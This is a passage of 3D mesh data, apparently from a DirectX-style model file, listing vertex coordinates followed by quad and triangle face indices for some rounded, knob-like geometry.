-0.384664;0.674236;-1.162490;, -0.402574;0.674236;-1.150820;, -0.400678;0.674236;-1.149740;, -0.413216;0.652084;-1.161350;, -0.412838;0.652084;-1.156350;, -0.385060;0.652103;-1.174130;, -0.388709;0.652036;-1.176290;, -0.381968;0.652115;-1.171240;, -0.412528;0.652091;-1.165970;, -0.399763;0.674236;-1.163250;, -0.405726;0.674236;-1.166090;, -0.391079;0.674236;-1.162010;, -0.385567;0.674236;-1.165580;, -0.397353;0.674236;-1.155410;, -0.396896;0.674236;-1.149170;, -0.381522;0.674236;-1.155730;, -0.406617;0.674236;-1.164220;, -0.400654;0.674236;-1.161370;, -0.386649;0.674236;-1.167270;, -0.392162;0.674236;-1.163690;, -0.393023;0.674236;-1.149480;, -0.393481;0.674236;-1.155710;, -0.408372;0.674236;-1.168200;, -0.397645;0.674236;-1.145810;, -0.386365;0.652036;-1.145260;, -0.391464;0.652019;-1.143530;, -0.394010;0.652019;-1.177230;, -0.380459;0.652115;-1.151260;, -0.383082;0.652103;-1.147950;, -0.411466;0.652091;-1.151880;, -0.407020;0.674236;-1.150300;, -0.404720;0.674236;-1.152780;, -0.384865;0.674236;-1.156310;, -0.399778;0.674236;-1.174050;, -0.398532;0.674236;-1.170840;, -0.399252;0.674236;-1.156490;, -0.390855;0.674236;-1.159020;, -0.398048;0.674236;-1.164610;, -0.382836;0.672544;-1.170630;, -0.384302;0.674236;-1.169700;, -0.386457;0.674236;-1.171710;, -0.385629;0.672530;-1.173240;, -0.411544;0.672543;-1.165550;, -0.409966;0.674236;-1.164840;, -0.410433;0.674236;-1.161510;, -0.412164;0.672536;-1.161380;, -0.409951;0.672543;-1.168920;, -0.411722;0.669142;-1.165590;, -0.382711;0.669166;-1.170760;, -0.397504;0.672515;-1.144080;, -0.391593;0.672515;-1.144550;, -0.391526;0.669071;-1.144380;, -0.378948;0.652103;-1.154640;, -0.409099;0.674236;-1.153390;, -0.405883;0.674236;-1.154510;, -0.382996;0.674236;-1.152430;, -0.385685;0.674236;-1.154480;, -0.393866;0.674236;-1.174480;, -0.394658;0.674236;-1.171120;, -0.412341;0.669135;-1.161410;, -0.385505;0.669154;-1.173370;, -0.386921;0.669086;-1.145940;, -0.383778;0.672530;-1.148740;, -0.384826;0.674236;-1.150120;, -0.381409;0.672544;-1.151740;, -0.410552;0.672543;-1.152440;, -0.393987;0.672515;-1.176210;, -0.391736;0.674236;-1.146270;, -0.410063;0.674236;-1.156610;, -0.406846;0.674236;-1.157730;, -0.381267;0.669166;-1.151630;, -0.383637;0.669154;-1.148630;, -0.393945;0.669071;-1.176390;, -0.389156;0.669086;-1.175530;, -0.389199;0.672530;-1.175350;, -0.409335;0.652115;-1.148730;, -0.410725;0.669142;-1.152380;, -0.400031;0.652026;-1.176800;, -0.390025;0.674236;-1.173830;, -0.411793;0.672536;-1.156480;, -0.407085;0.674236;-1.160890;, -0.388805;0.674236;-1.169280;, -0.389321;0.674236;-1.150700;, -0.388034;0.674236;-1.147490;, -0.386988;0.672530;-1.146110;, -0.400415;0.674236;-1.158210;, -0.390816;0.674236;-1.170470;, -0.394175;0.674236;-1.164890;, -0.387512;0.674236;-1.152180;, -0.391673;0.674236;-1.157190;, -0.411964;0.669135;-1.156420;, -0.391175;0.594776;-1.144020;, -0.397870;0.594776;-1.143490;, -0.402507;0.594790;-1.144240;, -0.406190;0.594790;-1.146340;, -0.408944;0.594800;-1.148850;, -0.411175;0.594800;-1.152150;, -0.412393;0.594795;-1.156120;, -0.412808;0.594795;-1.161640;, -0.412201;0.594800;-1.165740;, -0.410492;0.594800;-1.169350;, -0.408146;0.594790;-1.172250;, -0.404822;0.594790;-1.174880;, -0.400350;0.594776;-1.176300;, -0.393647;0.594776;-1.176790;, -0.388954;0.594790;-1.175950;, -0.385112;0.594790;-1.173670;, -0.382360;0.594802;-1.171110;, -0.380273;0.594802;-1.167860;, -0.379125;0.594799;-1.164030;, -0.378730;0.594799;-1.158820;, -0.379291;0.594802;-1.154860;, -0.380869;0.594802;-1.151330;, -0.379145;0.594803;-1.150290;, -0.381767;0.594790;-1.146970;, -0.385669;0.594790;-1.143780;, -0.390768;0.594774;-1.142050;, -0.397951;0.594774;-1.141480;, -0.403183;0.594790;-1.142320;, -0.407373;0.594790;-1.144710;, -0.410468;0.594801;-1.147530;, -0.412999;0.594801;-1.151280;, -0.414371;0.594795;-1.155750;, -0.414819;0.594795;-1.161710;, -0.414136;0.594801;-1.166330;, -0.412197;0.594801;-1.170420;, -0.409561;0.594790;-1.173680;, -0.405777;0.594790;-1.176670;, -0.400731;0.594774;-1.178280;, -0.393543;0.594774;-1.178800;, -0.388245;0.594790;-1.177860;, -0.383906;0.594790;-1.175280;, -0.380813;0.594803;-1.172400;, -0.378438;0.594803;-1.168700;, -0.377147;0.594800;-1.164400;, -0.376719;0.594800;-1.158750;, -0.377350;0.594803;-1.154300;, -0.351151;0.594795;-1.064020;, -0.345584;0.594793;-1.080250;, -0.356025;0.594795;-1.066630;, -0.357167;0.621383;-1.064970;, -0.357165;0.596807;-1.064970;, -0.360695;0.596823;-1.068030;, -0.360696;0.621389;-1.068030;, -0.351899;0.621383;-1.062140;, -0.351900;0.596807;-1.062150;, -0.347395;0.621389;-1.060900;, -0.347395;0.596823;-1.060900;, -0.342871;0.621389;-1.061020;, -0.342867;0.596815;-1.061020;, -0.338826;0.621378;-1.062110;, -0.338823;0.596802;-1.062110;, -0.334561;0.621378;-1.064360;, -0.334558;0.596823;-1.064360;, -0.331042;0.621362;-1.068320;, -0.331039;0.596788;-1.068320;, -0.327657;0.621362;-1.074680;, -0.327658;0.596790;-1.074680;, -0.326376;0.621378;-1.079910;, -0.326375;0.596823;-1.079910;, -0.326970;0.621378;-1.084920;, -0.326968;0.596802;-1.084920;, -0.328360;0.621391;-1.088910;, -0.328358;0.596819;-1.088920;, -0.330778;0.621391;-1.092580;, -0.330779;0.596822;-1.092580;, -0.334189;0.621388;-1.095510;, -0.334189;0.596812;-1.095510;, -0.339184;0.621388;-1.098180;, -0.339183;0.596811;-1.098180;, -0.343506;0.621391;-1.099410;, -0.343504;0.596823;-1.099410;, -0.347902;0.621391;-1.099390;, -0.347904;0.596819;-1.099390;, -0.351997;0.621378;-1.098330;, -0.351999;0.596801;-1.098330;, -0.356497;0.621378;-1.096060;, -0.356498;0.596823;-1.096060;, -0.360143;0.621362;-1.092100;, -0.360145;0.596790;-1.092100;, -0.363569;0.621362;-1.085760;, -0.363567;0.596788;-1.085760;, -0.364919;0.621378;-1.080630;, -0.364918;0.596823;-1.080640;, -0.364434;0.621378;-1.075840;, -0.364434;0.596802;-1.075840;, -0.363102;0.621389;-1.071860;, -0.363102;0.596815;-1.071860;, -0.361828;0.672532;-1.076540;, -0.362228;0.672532;-1.080490;, -0.360498;0.674236;-1.080600;, -0.360096;0.674236;-1.076660;, -0.339976;0.672541;-1.095640;, -0.335865;0.672541;-1.093440;, -0.336685;0.674236;-1.091910;, -0.340795;0.674236;-1.094120;, -0.336173;0.672532;-1.066520;, -0.339679;0.672532;-1.064670;, -0.340546;0.674236;-1.066170;, -0.337039;0.674236;-1.068020;, -0.339635;0.669157;-1.064490;, -0.343292;0.669166;-1.063510;, -0.343336;0.672543;-1.063680;, -0.335745;0.669150;-1.093570;, -0.332664;0.669154;-1.090930;, -0.332786;0.672544;-1.090800;, -0.362408;0.669095;-1.080520;, -0.361189;0.669077;-1.085150;, -0.361010;0.672515;-1.085120;, -0.335632;0.652044;-1.065600;, -0.339224;0.652105;-1.063710;, -0.336043;0.669095;-1.066390;, -0.339522;0.652098;-1.096590;, -0.335334;0.652098;-1.094340;, -0.339931;0.669150;-1.095820;, -0.362881;0.652105;-1.076390;, -0.363290;0.652044;-1.080430;, -0.361999;0.669157;-1.076480;, -0.359172;0.674236;-1.073900;, -0.360625;0.672543;-1.072950;, -0.334526;0.674236;-1.070910;, -0.332993;0.672515;-1.070100;, -0.332864;0.669077;-1.069970;, -0.332113;0.652026;-1.069560;, -0.343836;0.669154;-1.096920;, -0.343841;0.652103;-1.097810;, -0.360796;0.669166;-1.072890;, -0.361551;0.652115;-1.072420;, -0.357118;0.674236;-1.079920;, -0.356900;0.674236;-1.077750;, -0.338974;0.674236;-1.089410;, -0.341616;0.674236;-1.090820;, -0.341401;0.674236;-1.069440;, -0.339469;0.674236;-1.070460;, -0.327998;0.652036;-1.080120;, -0.328499;0.652103;-1.084340;, -0.329279;0.652019;-1.074890;, -0.350373;0.674236;-1.078500;, -0.355973;0.674236;-1.074990;, -0.344657;0.674236;-1.085150;, -0.344709;0.674236;-1.091720;, -0.342463;0.674236;-1.076310;, -0.336958;0.674236;-1.073350;, -0.343354;0.674236;-1.065420;, -0.359485;0.674236;-1.084290;, -0.354869;0.674236;-1.073230;, -0.349268;0.674236;-1.076740;, -0.346711;0.674236;-1.091710;, -0.346661;0.674236;-1.085140;, -0.335134;0.674236;-1.076770;, -0.340637;0.674236;-1.079740;, -0.343887;0.674236;-1.095020;, -0.355997;0.652084;-1.066130;, -0.359526;0.652091;-1.069190;, -0.351638;0.652103;-1.096740;, -0.347543;0.652115;-1.097790;, -0.359070;0.652019;-1.090860;, -0.355425;0.652036;-1.094830;, -0.329886;0.652115;-1.088330;, -0.347077;0.652091;-1.062520;, -0.351582;0.652084;-1.063760;, -0.344211;0.674236;-1.068690;, -0.334225;0.674236;-1.089830;, -0.336514;0.674236;-1.087330;, -0.356108;0.674236;-1.083610;, -0.344393;0.674236;-1.075290;, -0.342015;0.674236;-1.083730;, -0.350592;0.674236;-1.080670;, -0.330209;0.672515;-1.075330;, -0.331741;0.674236;-1.076140;, -0.330780;0.674236;-1.079920;, -0.329052;0.672530;-1.080050;, -0.358647;0.672543;-1.069800;, -0.358771;0.669142;-1.069670;, -0.343880;0.672544;-1.096750;, -0.347494;0.672544;-1.096740;, -0.347536;0.669166;-1.096910;, -0.330029;0.669071;-1.075300;, -0.343271;0.652115;-1.062620;, -0.361941;0.652026;-1.085550;, -0.346471;0.674236;-1.075240;, -0.348746;0.674236;-1.084090;, -0.340912;0.674236;-1.082060;, -0.347075;0.674236;-1.065320;, -0.346287;0.674236;-1.068630;, -0.332236;0.674236;-1.086820;, -0.335412;0.674236;-1.085660;, -0.356668;0.674236;-1.089500;, -0.354263;0.674236;-1.087030;, -0.355583;0.669135;-1.066900;, -0.351237;0.669154;-1.095960;, -0.328872;0.669086;-1.080020;, -0.351124;0.672536;-1.064710;, -0.350308;0.674236;-1.066240;, -0.347057;0.672543;-1.063580;, -0.354898;0.672530;-1.093910;, -0.354055;0.674236;-1.092390;, -0.358192;0.672515;-1.090330;, -0.330797;0.672544;-1.087780;, -0.347502;0.674236;-1.095000;, -0.349520;0.674236;-1.069550;, -0.330628;0.669166;-1.087840;, -0.329371;0.669154;-1.084230;, -0.329543;0.672530;-1.084170;, -0.358319;0.669071;-1.090460;, -0.355025;0.669086;-1.094040;, -0.347099;0.669142;-1.063410;, -0.331922;0.652103;-1.091420;, -0.331270;0.674236;-1.084030;, -0.357192;0.674236;-1.070750;, -0.352316;0.674236;-1.071050;, -0.349563;0.674236;-1.090980;, -0.334172;0.674236;-1.080550;, -0.354639;0.674236;-1.068560;, -0.355458;0.672536;-1.067030;, -0.350353;0.674236;-1.094260;, -0.351194;0.672530;-1.095780;, -0.351650;0.674236;-1.089920;, -0.334447;0.674236;-1.082870;, -0.351168;0.669135;-1.064530;, -0.359161;0.594800;-1.069350;, -0.361280;0.594800;-1.072720;, -0.362466;0.594790;-1.076260;, -0.362892;0.594790;-1.080480;, -0.361695;0.594776;-1.085020;, -0.358502;0.594776;-1.090930;, -0.355271;0.594790;-1.094440;, -0.351287;0.594790;-1.096450;, -0.347642;0.594802;-1.097390;, -0.343780;0.594802;-1.097410;, -0.339938;0.594799;-1.096320;, -0.335325;0.594799;-1.093850;, -0.332293;0.594802;-1.091240;, -0.330166;0.594802;-1.088030;, -0.328930;0.594790;-1.084470;, -0.328404;0.594790;-1.080030;, -0.329540;0.594776;-1.075400;, -0.332695;0.594776;-1.069470;, -0.335814;0.594790;-1.065960;, -0.339561;0.594790;-1.063980;, -0.343161;0.594800;-1.063010;, -0.347148;0.594800;-1.062910;, -0.356496;0.594790;-1.096060;, -0.351996;0.594790;-1.098330;, -0.347901;0.594803;-1.099390;, -0.343505;0.594803;-1.099410;, -0.339184;0.594800;-1.098180;, -0.334188;0.594800;-1.095510;, -0.330778;0.594803;-1.092580;, -0.328359;0.594803;-1.088920;, -0.326969;0.594790;-1.084920;, -0.326375;0.594790;-1.079910;, -0.327657;0.594774;-1.074680;, -0.331041;0.594774;-1.068320;, -0.334560;0.594790;-1.064360;, -0.338825;0.594790;-1.062110;, -0.342870;0.594801;-1.061020;, -0.347394;0.594801;-1.060900;, -0.351899;0.594795;-1.062150;, -0.357166;0.594795;-1.064970;, -0.360696;0.594801;-1.068030;, -0.363101;0.594801;-1.071860;, -0.364433;0.594790;-1.075840;, -0.364918;0.594790;-1.080640;, -0.363568;0.594774;-1.085760;, -0.360143;0.594774;-1.092100;, -0.232225;0.478616;-1.283230;, -0.331357;0.478616;-1.292120;, -0.374316;0.478616;-1.269120;, -0.393639;0.478616;-1.086230;, -0.306195;0.478616;-1.038690;, -0.210749;0.478616;-1.066910;, -0.177320;0.478616;-1.107710;, -0.310437;0.683063;-1.149210;, -0.308582;0.684621;-1.150600;, -0.302782;0.684623;-1.145870;, -0.303876;0.683065;-1.143830;, -0.296274;0.684623;-1.143900;, -0.296494;0.683065;-1.141600;, -0.288827;0.684621;-1.144620;, -0.288054;0.683063;-1.142440;, -0.282803;0.684619;-1.147810;, -0.281255;0.683061;-1.146080;, -0.278007;0.684615;-1.153590;, -0.275880;0.683056;-1.152640;, -0.275983;0.684611;-1.160140;, -0.273647;0.683052;-1.160020;, -0.276687;0.684607;-1.167650;, -0.274485;0.683048;-1.168460;, -0.279908;0.684605;-1.173730;, -0.278125;0.683045;-1.175260;, -0.285752;0.684603;-1.178540;, -0.284686;0.683043;-1.180630;, -0.292343;0.684603;-1.180530;, -0.292068;0.683043;-1.182870;, -0.299874;0.684605;-1.179770;, -0.300508;0.683045;-1.182030;, -0.305922;0.684607;-1.176500;, -0.307307;0.683048;-1.178390;, -0.310674;0.684611;-1.170630;, -0.312683;0.683052;-1.171830;, -0.312616;0.684615;-1.164060;, -0.314916;0.683056;-1.164450;, -0.311828;0.684619;-1.156590;, -0.314078;0.683061;-1.156010;, -0.258387;0.616187;-1.192210;, -0.269249;0.625337;-1.182870;, -0.279326;0.625312;-1.191170;, -0.272820;0.616202;-1.203970;, -0.290691;0.625312;-1.194600;, -0.289012;0.616202;-1.208870;, -0.303676;0.625337;-1.193290;, -0.307540;0.616187;-1.207080;, -0.314104;0.625379;-1.187650;, -0.322528;0.616162;-1.199170;, -0.322296;0.625441;-1.177530;, -0.334480;0.616123;-1.184800;, -0.325645;0.625503;-1.166210;, -0.339554;0.616083;-1.168530;, -0.324289;0.625569;-1.153330;, -0.337849;0.616038;-1.149800;, -0.318694;0.625616;-1.142990;, -0.329847;0.616006;-1.134630;, -0.308693;0.625644;-1.134840;, -0.315263;0.615986;-1.122590;, -0.297469;0.625644;-1.131440;, -0.298791;0.615986;-1.117610;, -0.284626;0.625616;-1.132690;, -0.279980;0.616006;-1.119540;, -0.274240;0.625569;-1.138190;, -0.264909;0.616038;-1.127740;, -0.265973;0.625503;-1.148160;, -0.253108;0.616083;-1.142380;, -0.262483;0.625441;-1.159440;, -0.248312;0.616123;-1.158740;, -0.263697;0.625379;-1.172400;, -0.250300;0.616162;-1.177320;, -0.277444;0.633281;-1.141780;, -0.279221;0.642129;-1.143770;, -0.273027;0.642123;-1.151330;, -0.270511;0.633255;-1.150200;, -0.270453;0.642118;-1.159840;, -0.267612;0.633231;-1.159700;, -0.271419;0.642113;-1.169570;, -0.268668;0.633207;-1.170570;, -0.275615;0.642109;-1.177400;, -0.273348;0.633191;-1.179350;, -0.283175;0.642107;-1.183600;, -0.281805;0.633181;-1.186290;, -0.291683;0.642107;-1.186170;, -0.291330;0.633181;-1.189170;, -0.301410;0.642109;-1.185210;, -0.302217;0.633191;-1.188080;, -0.309245;0.642113;-1.181010;, -0.310977;0.633207;-1.183370;, -0.315440;0.642118;-1.173450;, -0.317885;0.633231;-1.174900;, -0.318013;0.642123;-1.164940;, -0.320736;0.633255;-1.165390;, -0.317048;0.642129;-1.155220;, -0.319633;0.633281;-1.154540;, -0.312852;0.642132;-1.147380;, -0.314939;0.633298;-1.145810;, -0.305291;0.642135;-1.141180;, -0.306507;0.633309;-1.138920;, -0.296784;0.642135;-1.138610;, -0.297029;0.633309;-1.136050;, -0.287057;0.642132;-1.139580;, -0.286189;0.633298;-1.137110;, -0.387371;0.597444;-1.091490;, -0.388603;0.594044;-1.090520;, -0.410287;0.594044;-1.131010;, -0.408748;0.597431;-1.131380;, -0.415264;0.594044;-1.181150;, -0.413680;0.597412;-1.180920;, -0.401964;0.594044;-1.225110;, -0.400585;0.597394;-1.224260;, -0.370031;0.594044;-1.264090;, -0.369037;0.597376;-1.262790;, -0.329540;0.594044;-1.285770;, -0.329121;0.597364;-1.284180;, -0.279401;0.594044;-1.290750;, -0.279562;0.597357;-1.289100;, -0.235435;0.594044;-1.277450;, -0.236211;0.597357;-1.275990;, -0.196462;0.594044;-1.245510;, -0.197692;0.597364;-1.244420;, -0.174778;0.594044;-1.205020;, -0.176324;0.597376;-1.204490;, -0.169800;0.594044;-1.154880;, -0.171418;0.597394;-1.154940;, -0.183101;0.594044;-1.110920;, -0.184543;0.597412;-1.111610;, -0.215033;0.594044;-1.071940;, -0.216105;0.597431;-1.073110;, -0.255524;0.594044;-1.050260;, -0.256013;0.597444;-1.051750;, -0.305665;0.594044;-1.045280;, -0.305546;0.597453;-1.046840;, -0.349629;0.594044;-1.058580;, -0.348866;0.597453;-1.059940;, -0.403895;0.602298;-1.132640;, -0.400588;0.603959;-1.133500;, -0.380721;0.603980;-1.096480;, -0.383444;0.602301;-1.094430;, -0.344971;0.603992;-1.067210;, -0.346575;0.602303;-1.064220;, -0.304762;0.603992;-1.055040;, -0.305085;0.602303;-1.051660;, -0.258782;0.603980;-1.059590;, -0.257648;0.602301;-1.056380;, -0.221721;0.603959;-1.079400;, -0.219444;0.602298;-1.076850;, -0.192387;0.603930;-1.115130;, -0.189252;0.602293;-1.113720;, -0.180168;0.603901;-1.155370;, -0.176719;0.602288;-1.155200;, -0.184699;0.603872;-1.201420;, -0.181441;0.602282;-1.202620;, -0.204541;0.603852;-1.238530;, -0.201901;0.602278;-1.240800;, -0.240334;0.603841;-1.267880;, -0.238753;0.602275;-1.270990;, -0.280626;0.603841;-1.280070;, -0.280218;0.602275;-1.283530;, -0.326685;0.603852;-1.275480;, -0.327624;0.602278;-1.278830;, -0.363771;0.603872;-1.255590;, -0.365819;0.602282;-1.258390;, -0.393062;0.603901;-1.219770;, -0.396028;0.602288;-1.221540;, -0.405199;0.603930;-1.179510;, -0.408588;0.602293;-1.180070;, -0.213305;0.564398;-1.070530;, -0.211850;0.507781;-1.067810;, -0.253849;0.507781;-1.045320;, -0.255303;0.564398;-1.048040;, -0.392737;0.507781;-1.087330;, -0.351936;0.507781;-1.053900;, -0.329762;0.564398;-1.287990;, -0.279622;0.564398;-1.292970;, -0.181370;0.564398;-1.109500;, -0.178421;0.507781;-1.108610;, -0.306336;0.507781;-1.040110;, -0.305444;0.564398;-1.043060;, -0.415227;0.507781;-1.129330;, -0.192327;0.507781;-1.248700;, -0.169837;0.507781;-1.206700;, -0.420437;0.507781;-1.181820;, -0.351044;0.564398;-1.056850;, -0.278728;0.507781;-1.295920;, -0.331216;0.507781;-1.290710;, -0.417490;0.564398;-1.180930;, -0.406644;0.507781;-1.227420;, -0.403694;0.564398;-1.226530;, -0.233128;0.507781;-1.282130;, -0.412510;0.564398;-1.130780;, -0.195045;0.564398;-1.247240;, -0.234019;0.564398;-1.279180;, -0.172554;0.564398;-1.205240;, -0.371760;0.564398;-1.265500;, -0.373214;0.507781;-1.268220;, -0.167575;0.564398;-1.155100;, -0.390021;0.564398;-1.088790;, -0.164628;0.507781;-1.154210;, -0.294638;0.684614;-1.161050;, -0.317116;0.608305;-1.241290;, -0.343136;0.608316;-1.227360;, -0.363707;0.608332;-1.202250;, -0.372253;0.608348;-1.174000;, -0.369047;0.608365;-1.141700;, -0.355113;0.608376;-1.115680;, -0.330006;0.608383;-1.095100;, -0.301754;0.608383;-1.086560;, -0.269453;0.608376;-1.089770;, -0.243433;0.608365;-1.103700;, -0.222862;0.608348;-1.128810;, -0.214315;0.608332;-1.157060;, -0.217522;0.608316;-1.189360;, -0.231456;0.608305;-1.215380;, -0.256563;0.608298;-1.235950;, -0.284815;0.608298;-1.244500;, -0.301053;0.664825;-1.183960;, -0.308479;0.664828;-1.179980;, -0.314350;0.664832;-1.172810;, -0.316789;0.664837;-1.164750;, -0.315874;0.664842;-1.155530;, -0.311898;0.664845;-1.148110;, -0.304732;0.664847;-1.142230;, -0.296669;0.664847;-1.139790;, -0.287449;0.664845;-1.140710;, -0.280023;0.664842;-1.144690;, -0.274152;0.664837;-1.151850;, -0.271713;0.664832;-1.159920;, -0.272628;0.664828;-1.169130;, -0.276605;0.664825;-1.176560;, -0.283771;0.664823;-1.182430;, -0.291834;0.664823;-1.184870;, -0.300698;0.679926;-1.182710;, -0.307717;0.679929;-1.178950;, -0.313266;0.679933;-1.172170;, -0.315571;0.679938;-1.164550;, -0.314706;0.679942;-1.155840;, -0.310948;0.679945;-1.148820;, -0.304175;0.679947;-1.143270;, -0.296555;0.679947;-1.140970;, -0.287842;0.679945;-1.141830;, -0.280823;0.679942;-1.145590;, -0.275275;0.679938;-1.152370;, -0.272969;0.679933;-1.159990;, -0.273834;0.679929;-1.168700;, -0.277593;0.679926;-1.175720;, -0.284365;0.679924;-1.181270;, -0.291986;0.679924;-1.183570;; 1702; 4;1567,1572,1383,8;, 4;1384,1568,1567,8;, 4;1567,1568,1556,1557;, 4;1557,1575,1572,1567;, 4;1575,1557,1498,1500;, 4;1498,1557,1556,1496;, 4;1497,1499,1498,1496;, 4;1499,1501,1500,1498;, 4;1501,1499,1541,1539;, 4;1499,1497,1543,1541;, 4;1497,1495,1545,1543;, 4;1495,1497,1496,1494;, 4;1556,1577,1494,1496;, 4;1577,1556,1568,1578;, 4;1578,1568,1384,1385;, 4;1,1570,1578,1385;, 4;1578,1570,1571,1577;, 4;1571,1492,1494,1577;, 4;1493,1495,1494,1492;, 4;1495,1493,1547,1545;, 4;1545,1547,1546,1544;, 4;1544,1546,1585,1584;, 4;1542,1544,1584,1583;, 4;1543,1545,1544,1542;, 4;1541,1543,1542,1540;, 4;1539,1541,1540,1538;, 4;1538,1540,1598,1597;, 4;1540,1542,1583,1598;, 4;1598,1583,1429,1427;, 4;1597,1598,1427,1425;, 4;1596,1597,1425,1422;, 4;1595,1596,1422,1453;, 4;1534,1536,1596,1595;, 4;1535,1537,1536,1534;, 4;1505,1503,1537,1535;, 4;1503,1505,1504,1502;, 4;1504,1576,1574,1502;, 4;1574,1576,1564,1563;, 4;1563,1564,7,6;, 4;1383,1572,1563,6;, 4;1563,1572,1575,1574;, 4;1574,1575,1500,1502;, 4;1501,1503,1502,1500;, 4;1503,1501,1539,1537;, 4;1537,1539,1538,1536;, 4;1536,1538,1597,1596;, 4;1532,1534,1595,1594;, 4;1533,1535,1534,1532;, 4;1507,1505,1535,1533;, 4;1505,1507,1506,1504;, 4;1576,1504,1506,1579;, 4;1581,1564,1576,1579;, 4;7,1564,1581,5;, 4;1581,1559,1389,5;, 4;1579,1558,1559,1581;, 4;1508,1558,1579,1506;, 4;1507,1509,1508,1506;, 4;1509,1507,1533,1531;, 4;1531,1533,1532,1530;, 4;1530,1532,1594,1593;, 4;1593,1594,1451,1449;, 4;1449,1451,1450,1448;, 4;1448,1450,1459,1457;, 4;1446,1448,1457,1454;, 4;1447,1449,1448,1446;, 4;1592,1593,1449,1447;, 4;1528,1530,1593,1592;, 4;1529,1531,1530,1528;, 4;1511,1509,1531,1529;, 4;1509,1511,1510,1508;, 4;1510,1550,1558,1508;, 4;1551,1559,1558,1550;, 4;1389,1559,1551,1388;, 4;1551,1552,4,1388;, 4;1550,1553,1552,1551;, 4;1553,1550,1510,1512;, 4;1511,1513,1512,1510;, 4;1513,1511,1529,1527;, 4;1527,1529,1528,1526;, 4;1525,1527,1526,1524;, 4;1515,1513,1527,1525;, 4;1513,1515,1514,1512;, 4;1553,1512,1514,1561;, 4;1560,1552,1553,1561;, 4;4,1552,1560,1387;, 4;1560,1555,3,1387;, 4;1561,1566,1555,1560;, 4;1516,1566,1561,1514;, 4;1515,1517,1516,1514;, 4;1517,1515,1525,1523;, 4;1523,1525,1524,1522;, 4;1522,1524,1590,1589;, 4;1524,1526,1591,1590;, 4;1526,1528,1592,1591;, 4;1591,1592,1447,1445;, 4;1590,1591,1445,1443;, 4;1589,1590,1443,1441;, 4;1588,1589,1441,1439;, 4;1439,1441,1440,1438;, 4;1438,1440,1481,1479;, 4;1440,1442,1483,1481;, 4;1442,1444,1485,1483;, 4;1443,1445,1444,1442;, 4;1441,1443,1442,1440;, 4;1437,1439,1438,1436;, 4;1436,1438,1479,1477;, 4;1434,1436,1477,1475;, 4;1435,1437,1436,1434;, 4;1586,1587,1437,1435;, 4;1548,1519,1587,1586;, 4;1549,1518,1519,1548;, 4;1491,1489,1518,1549;, 4;1489,1491,1490,1488;, 4;1490,1569,1573,1488;, 4;1565,1562,1573,1569;, 4;2,1562,1565,0;, 4;1565,1570,1,0;, 4;1569,1571,1570,1565;, 4;1492,1571,1569,1490;, 4;1491,1493,1492,1490;, 4;1493,1491,1549,1547;, 4;1547,1549,1548,1546;, 4;1546,1548,1586,1585;, 4;1585,1586,1435,1433;, 4;1433,1435,1434,1432;, 4;1432,1434,1475,1473;, 4;1430,1432,1473,1471;, 4;1428,1430,1471,1469;, 4;1426,1428,1469,1467;, 4;1424,1426,1467,1465;, 4;1423,1424,1465,1463;, 4;1452,1423,1463,1461;, 4;1453,1422,1423,1452;, 4;1422,1425,1424,1423;, 4;1425,1427,1426,1424;, 4;1427,1429,1428,1426;, 4;1429,1431,1430,1428;, 4;1431,1433,1432,1430;, 4;1584,1585,1433,1431;, 4;1583,1584,1431,1429;, 4;1587,1588,1439,1437;, 4;1519,1520,1588,1587;, 4;1518,1521,1520,1519;, 4;1489,1486,1521,1518;, 4;1486,1489,1488,1487;, 4;1488,1573,1580,1487;, 4;1580,1573,1562,1554;, 4;1554,1562,2,1386;, 4;3,1555,1554,1386;, 4;1554,1555,1566,1580;, 4;1566,1516,1487,1580;, 4;1517,1486,1487,1516;, 4;1486,1517,1523,1521;, 4;1521,1523,1522,1520;, 4;1520,1522,1589,1588;, 4;1445,1447,1446,1444;, 4;1444,1446,1454,1485;, 4;1450,1452,1461,1459;, 4;1451,1453,1452,1450;, 4;1594,1595,1453,1451;, 4;1459,1461,1460,1458;, 4;1457,1459,1458,1456;, 4;1456,1458,1610,1609;, 4;1458,1460,1611,1610;, 4;1460,1462,1612,1611;, 4;1611,1612,1628,1627;, 4;1610,1611,1627,1626;, 4;1609,1610,1626,1625;, 4;1625,1626,1403,1401;, 4;1626,1627,1405,1403;, 4;1627,1628,1407,1405;, 4;1628,1629,1409,1407;, 4;1612,1613,1629,1628;, 4;1462,1464,1613,1612;, 4;1463,1465,1464,1462;, 4;1461,1463,1462,1460;, 4;1465,1467,1466,1464;, 4;1464,1466,1614,1613;, 4;1613,1614,1630,1629;, 4;1629,1630,1411,1409;, 4;1630,1615,1413,1411;, 4;1614,1599,1615,1630;, 4;1466,1468,1599,1614;, 4;1467,1469,1468,1466;, 4;1469,1471,1470,1468;, 4;1468,1470,1600,1599;, 4;1599,1600,1616,1615;, 4;1615,1616,1415,1413;, 4;1616,1617,1417,1415;, 4;1600,1601,1617,1616;, 4;1470,1472,1601,1600;, 4;1471,1473,1472,1470;, 4;1473,1475,1474,1472;, 4;1472,1474,1602,1601;, 4;1601,1602,1618,1617;, 4;1617,1618,1419,1417;, 4;1618,1619,1421,1419;, 4;1602,1603,1619,1618;, 4;1474,1476,1603,1602;, 4;1475,1477,1476,1474;, 4;1477,1479,1478,1476;, 4;1476,1478,1604,1603;, 4;1603,1604,1620,1619;, 4;1619,1620,1390,1421;, 4;1620,1621,1393,1390;, 4;1604,1605,1621,1620;, 4;1478,1480,1605,1604;, 4;1479,1481,1480,1478;, 4;1481,1483,1482,1480;, 4;1480,1482,1606,1605;, 4;1605,1606,1622,1621;, 4;1621,1622,1395,1393;, 4;1622,1623,1397,1395;, 4;1606,1607,1623,1622;, 4;1482,1484,1607,1606;, 4;1483,1485,1484,1482;, 4;1485,1454,1455,1484;, 4;1484,1455,1608,1607;, 4;1607,1608,1624,1623;, 4;1623,1624,1399,1397;, 4;1624,1625,1401,1399;, 4;1608,1609,1625,1624;, 4;1455,1456,1609,1608;, 4;1454,1457,1456,1455;, 4;1409,1411,1410,1408;, 4;1411,1413,1412,1410;, 4;1413,1415,1414,1412;, 3;1412,1414,1582;, 3;1410,1412,1582;, 3;1408,1410,1582;, 3;1406,1408,1582;, 4;1407,1409,1408,1406;, 4;1405,1407,1406,1404;, 3;1404,1406,1582;, 3;1402,1404,1582;, 4;1403,1405,1404,1402;, 4;1401,1403,1402,1400;, 3;1400,1402,1582;, 3;1398,1400,1582;, 3;1396,1398,1582;, 3;1394,1396,1582;, 3;1392,1394,1582;, 3;1391,1392,1582;, 3;1420,1391,1582;, 3;1418,1420,1582;, 4;1419,1421,1420,1418;, 4;1417,1419,1418,1416;, 3;1416,1418,1582;, 3;1414,1416,1582;, 4;1415,1417,1416,1414;, 